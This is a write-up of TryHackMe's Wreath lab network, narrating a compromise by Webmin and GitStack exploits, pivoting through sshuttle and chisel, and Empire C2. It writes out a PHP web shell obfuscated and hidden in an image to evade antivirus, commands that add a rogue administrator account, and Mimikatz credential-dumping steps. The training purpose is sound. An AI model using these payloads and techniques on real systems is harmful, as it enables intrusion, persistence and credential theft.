Try Hack Me — Wreath
Write-up on THM’s “Wreath” network.
Disclaimer
This document contains materials / information that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Scenario
There are two machines on my home network that host projects and stuff I’m working on in my own time — one of them has a webserver that’s port forwarded, so that’s your way in if you can find a vulnerability! It’s serving a website that’s pushed to my git server from my own PC for version control, then cloned to the public facing server. See if you can get into these! My own PC is also on that network, but I doubt you’ll be able to get into that as it has protections turned on, doesn’t run anything vulnerable, and can’t be accessed by the public-facing section of the network. Well, I say PC — it’s technically a repurposed server because I had a spare license lying around, but same difference. — Thomas Wreath.
Reconnaissance
Nmap scan report for 10.200.87.200
Host is up (0.10s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
9090/tcp closed zeus-admin
I have used nmap automator to automate the nmap scans. The initial result above did not reveal Webmin on tcp port 10000. Instead, I used the ‘All’ option.
Summary of nmapautomator with ‘All’ option.
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Document follows</h1>
|_<p>This web server is running in SSL mode. Try the URL <a href='https://ip-10- 200-87-200.eu-west-1.compute.internal:10000/'>https://ip-10-200-87-200.eu-west-1 .compute.internal:10000/</a> instead.<br></p>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug )
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclu sion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2 .6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__red irect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
| <h1>Error - Document follows</h1>
| <p>This web server is running in SSL mode. Try the URL <a href='https://ip-1 0-200-87-200.eu-west-1.compute.internal:10000/'>https://ip-10-200-87-200.eu-west -1.compute.internal:10000/</a> instead.<br></p>
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open a nd hold
| them open as long as possible. It accomplishes this by opening connecti ons to
| the target web server and sending a partial request. By doing so, it sta rves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path fun ction before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication , using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
| http://www.exploit-db.com/exploits/1997/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap .org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.37 seconds
Found Webmin running on port 10000/tcp and further research on MiniServ 1.890 (Webmin httpd) lead us to “CVE-2019-15107”.
Found python exploit for CVE-2019–15107 in Github as well.
┌─[✗]─[arcy24@parrot]─[~/Documents/tools]
└──╼ $git clone https://github.com/MuirlandOracle/CVE-2019-15107
Cloning into 'CVE-2019-15107'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 29 (delta 9), reused 14 (delta 3), pack-reused 0
Receiving objects: 100% (29/29), 19.47 KiB | 738.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
┌─[arcy24@parrot]─[~/Documents/tools]
cd to CVE-2019–15107 and install the python exploit
┌─[✗]─[arcy24@parrot]─[~/Documents/tools/CVE-2019-15107]
└──╼ $sudo pip3 install -r requirements.txt
Collecting argparse
Using cached argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.25.1)
Requirement already satisfied: urllib3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 3)) (1.26.2)
Requirement already satisfied: prompt_toolkit in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (3.0.14)
Installing collected packages: argparse
Successfully installed argparse-1.4.0
Launch the python exploit against host 10.200.87.200
The exploit was pretty straight forward. Follow the prompts and load netcat on desired port for the reverse shell.
Since we have root priv and browsing the .ssh folder, we can copy id_rsa so we can login via ssh
Copy id_rsa to your attack box, chmod 600 the ids_rsa file and log back in to the server.
Git Server Enumeration
Download a static nmap binary to your attack box and rename it as such. Serve a python http server from your attack box so you can copy nmap to the ‘prod-serv’ host.
ssh back into ‘prod-serv’
Copy nmap binary from attack box to ‘prod-serv’
Enumerating hosts in the network
- 10.200.87.1 — ?
- 10.200.87. — ?
- 10.200.87.250 — OpenVPN server
- 10.200.87.200 — PROD-SERV
Further Enumeration
Pivoting
The only access we have is through the ‘PROD-SERV’. In this case we have to use pivoting technique to access the other hosts from ‘PROD-SERV’
Used program called sshuttle and utilize the connection we have to the ‘PROD-SERV’. Initial attempt failed due to ‘Broken Pipe’ error. This occurs when the compromised machine that we are connecting to is part of the subnet that we need to gain access to.
- Note that the IP addresses changed due to a network reset but hosts are the same (from 10.200.87.x to 100.200.72.x)
To fix our broken pipe error, we have to use the ‘-x’ syntax excluding the server we are connecting to.
Initial access to http://10.200.72.x
Enumerating web services
Default username and password is a no go so we have to research exploits for Gitstack
Possible exploits
Downloading and Prepping the exploit
Use Gitstack — 2.3.10 Remote Code Execution
Covert the DOS line endings to Unix by using dos2unix so the python script will execute without any errors
Understand and update the exploit to match target server etc., then execute. Note: I have to edit my host file to reflect the hostname as well.
Exploit seems to be working and executed as ‘nt authority\system’
Further testing our exploit to get more information using curl
Using Burp
Reverse shell
The next task is to get a reverse shell from the ‘git-serv’ host from ‘prod-serv’. Just remember you still have to do your pivoting technique to make this all work.
On ‘prod-serv’, copy netcat
Using the same vector to send command to the ‘git-serv’ using powershell reverse shell.
Now that we have cli connection to the ‘gitserver’, next tasks are to add user and add our use to Admin and remote user groups.
PS C:\GitStack\gitphp> net user arcy24 bugok123 /add
The command completed successfully.PS C:\GitStack\gitphp> net localgroup Administrators arcy24 /add
The command completed successfully.PS C:\GitStack\gitphp> net localgroup "Remote Management Users" arcy24 /add
The command completed successfully.PS C:\GitStack\gitphp> net user arcy24
User name arcy24
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires NeverPassword last set 26/04/2021 12:31:19
Password expires Never
Password changeable 26/04/2021 12:31:19
Password required Yes
User may change password YesWorkstations allowed All
Logon script
User profile
Home directory
Last logon NeverLogon hours allowed AllLocal Group Memberships *Administrators *Remote Management Use
*Users
Global Group memberships *None
The command completed successfully.
Using evil-winrm to test our account
Post Exploitation
Next step is to use Mimikatz to dump local account password hashes. First, upload mimikatz.exe to ‘git-serv’
Mimikatz
Start mimikatz and set the parameters. Set debug privilege and elevate integrity to SYSTEM level:
privilege::debug
token::elevateSet Logging:
log c:\users\arcy24\Downloads\mimikatz.logDump lsamimikatz # lsadump::sam
Domain : xxxxx
SysKey : 0841f6354f4b96d21b99345d07b66571
Local SID : S-1-5-21-3335744492-1614955177-2693036043SAMKey : f4a3c96f8149df966517ec3554632cf4RID : 000001f4 (500)
User : Administrator
Hash NTLM: 37db630168e5f82xxxxxxxxxxxxSupplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 68b1608793104cca229de9f1dfb6fbae* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-1696O63F791Administrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8f7590c29ffc78998884823b1abbc05e6102a6e86a3ada9040e4f3dcb1a02955
aes128_hmac (4096) : 503dd1f25a0baa75791854a6cfbcd402
des_cbc_md5 (4096) : e3915234101c6b75
Since we have the administrator’s hash, we could use evil-winrm to pass the hash and login. Further, grabbed additional user hashes, may need it in the future.
Command & Control
I will be illustrating Empire as the tool for C&C as I am a bit familiar with it. Empire does not come pre-installed in Kali or Parrot OS, so you have to install it. To install, go to https://github.com/BC-SECURITY/Empire
First, set up listener via cli.
Listeners can also be created via UI
Empire is pretty straightforward to use and if you are familiar with Metasploit, empire’s syntax are almost identical.
Next is to create our stagers.
Create a multi/bash stager and use the Webserver (Starkiller) http module that we have create prior
Once you have executed the stager, load this to ‘prod-serv’
Once connected, you can check the status of the agents and can start interacting with the host.
Back to Pivoting
On to the next steps, we have to somehow install empire agents to the ‘git-server’. However, the only access we have is from the ‘prod-serv’ and the challenge is to install empire agent to the ‘git-server’ and have it communicate to our listeners (attack-box).
Since we have been using Empire, we’ll proceed on using http_hop. ‘ hop listeners’ create files to be copied across to our compromised “prod-serv” host and these files will be served from there. Further, these files contain instructions to connect back to a normal (usually HTTP) listener on our attacking machine.
It did took me a while to wrap my head around this process but the key is to get agents deployed in the network and have them communicating back to you via your compromised servers.
First step is to configure http_hop listener and note that the RedirectListener is your attack box which we have created a lister for a while back.
Once configured, execute and php files will be created in /tmp
Copy these files to the compromised host ‘prod-serv’ and serve the files using php
Next is to create a stager in Empire. This can be done either CLI or through Starkiller
After submitting, you will be given a poweshell command that we’ll use to execute the installation of our agent on the ‘git-server’
I’ve used curl to POST the powershell command from our empire stager and also URL encode it as well from my attack box.
On the ‘prod-server’, you will notice when the agent start communicating back to us once all the php files are accessed by the ‘git-server’
Empire agent active
Now that the empire agent is active, we can launch different modules such as but not limited to, WinPeas, Sherlock, etc. for privilege escalation or even Mimikatz to dump hashes.
Personal PC
Thus far, we have learned how to get to the git-server by ‘pivoting’ via sshuttle from the prod-serv
Enumerating Personal PC
Load empire tools in Evil-Winrm -s option (path of ps tools).
Load portscan module ‘Invoke-Portscan.ps1’ and scan the ‘Personal PC’
Now that we have the scan results, tcp/80 would be our possible way in. RDP tcp/3389 is no good for us if we don't have user name and password.
So, here’s the tricky part, we need to find a way to access the “Personal PC” from our attack box. We do know how to access the “Git-server” via sshuttle, how about the “Personal PC”?
Tried several ways to do this but the simpler method is to combine sshutlle with chisel. Here’s what we need:
- Download chisel one for attack box and another binary for the “git-server”. https://github.com/jpillora/chisel/releases/tag/v1.7.6
- Successful connection via sshuttle (first pivoting)
- Evil-winrm connection to the “git-server”
Upload chisel.exe to the “Git-server”
Before creating chisel socket, ensure that windows firewall port rule is created
Enable chisel sever using port 47000 socks5
From the attack box, setup the proxy connection in Firefox Foxy Proxy
Then load chisel client using port 9090 socks
Now we should be able to hit the web page. It is a bit slow since we are literally pivoting / tunneling twice.
The Wonders of Git
Once you have gone through the tasks for “Wonders of Git”, “Website Code Analysis”, and the “Exploit PoC”, you will eventually come across a web directory where you can upload files and this will be our attack vector.
The goal is to upload an image file that contains a PHP web-shell. Further, Thomas is possibly using some AV to check for any malicious files that are uploaded to our target host.
Here’s what we need:
- Exiftool — is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.
- PHP Obfuscator — https://www.gaijin.at/en/tools/php-obfuscator
- a jpeg file
Build the payload
<?php
$cmd = $_GET["wreath"];
if(isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
PHP Obfuscator
Obfuscated payload
<?php $r0=$_GET[base64_decode('d3JlYXRo')];if(isset($r0)){echo base64_decode('PHByZT4=').shell_exec($r0).base64_decode('PC9wcmU+');}die();?>
Then, escape the dollar signs to prevent them from being interpreted as bash variables
<?php \$r0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$r0)){echo base64_decode('PHByZT4=').shell_exec(\$r0).base64_decode('PC9wcmU+');}die();?>
Lastly, use the Exiftool to embed the obfuscated payload
Upload our shell
And execute commands
Dropping Netcat
Next phase is to upload netcat to Thomas’ PC and get a reverse shell. First is to set up a webserver to host our file (nc.exe).
Download nc.exe from our attack host to Thomas’ PC via curl in C:\Windows\temp\
Then, setup netcat listener on port 4444
Execute using powershell command
Initial Foothold ‘Wreath-PC’
System Information
Host Name: WREATH-PC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA778
Original Install Date: 08/11/2020, 14:55:50
System Boot Time: 08/06/2021, 11:40:41
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2395 Mhz
BIOS Version: Xen 4.2.amazon, 24/08/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,048 MB
Available Physical Memory: 1,298 MB
Virtual Memory: Max Size: 2,432 MB
Virtual Memory: Available: 1,793 MB
Virtual Memory: In Use: 639 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4580422
[02]: KB4512577
[03]: KB4580325
[04]: KB4587735
[05]: KB4592440
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.200.84.1
IP address(es)
[01]: 10.200.84.100
[02]: fe80::593:54b8:b02b:2440
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.C:\xampp\htdocs\resources\uploads>
Further Enumeration
whoami
wreath-pc\thomaswhoami /priv
whoami /privPRIVILEGES INFORMATION
----------------------Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledC:\xampp\htdocs\resources\uploads>whoami /groupsGROUP INFORMATION
-----------------Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288C:\xampp\htdocs\resources\uploads>
Privilege Escalation
Researched on ‘SeImpersonatePrivilege Impersonate a client after authentication Enabled’ and came across https://github.com/itm4n/PrintSpoofer — “PrintSpoofer and Potato series of privilege escalation exploits”.
Load up PrintSpoofer.exe and serve a web server.
From Wreath-PC, download the PrintSpoofer.exe
And now we have administrator privilege. There are possible privileges escalation to this host but this is the simplest one that I found. I will definitely update this write-up once I found additional methods.
Conclusion
This concludes our write-up for TryHackMe’s Wreath Network. Unquestionably learned a lot working through this network. Pivoting and AV evasion are my favorite tasks and to add, running Empire and Starkiller for post exploitation!
Tools and References:
- Nmap Automator — https://github.com/21y4d/nmapAutomator
- CVE-2019–15107 — https://github.com/MuirlandOracle/CVE-2019-15107
- sshuttle — https://github.com/sshuttle/sshuttle
- mimikatz — https://github.com/gentilkiwi/mimikatz/wiki
- Empire post-exploitation framework — https://github.com/BC-SECURITY/Empire
- Chisel — https://github.com/jpillora/chisel
- ExifTool — https://exiftool.org/
- PrintSpoofer — PrintSpoofer and Potato series of privilege escalation exploits https://github.com/itm4n/PrintSpoofer
- Wreath — https://tryhackme.com/room/wreath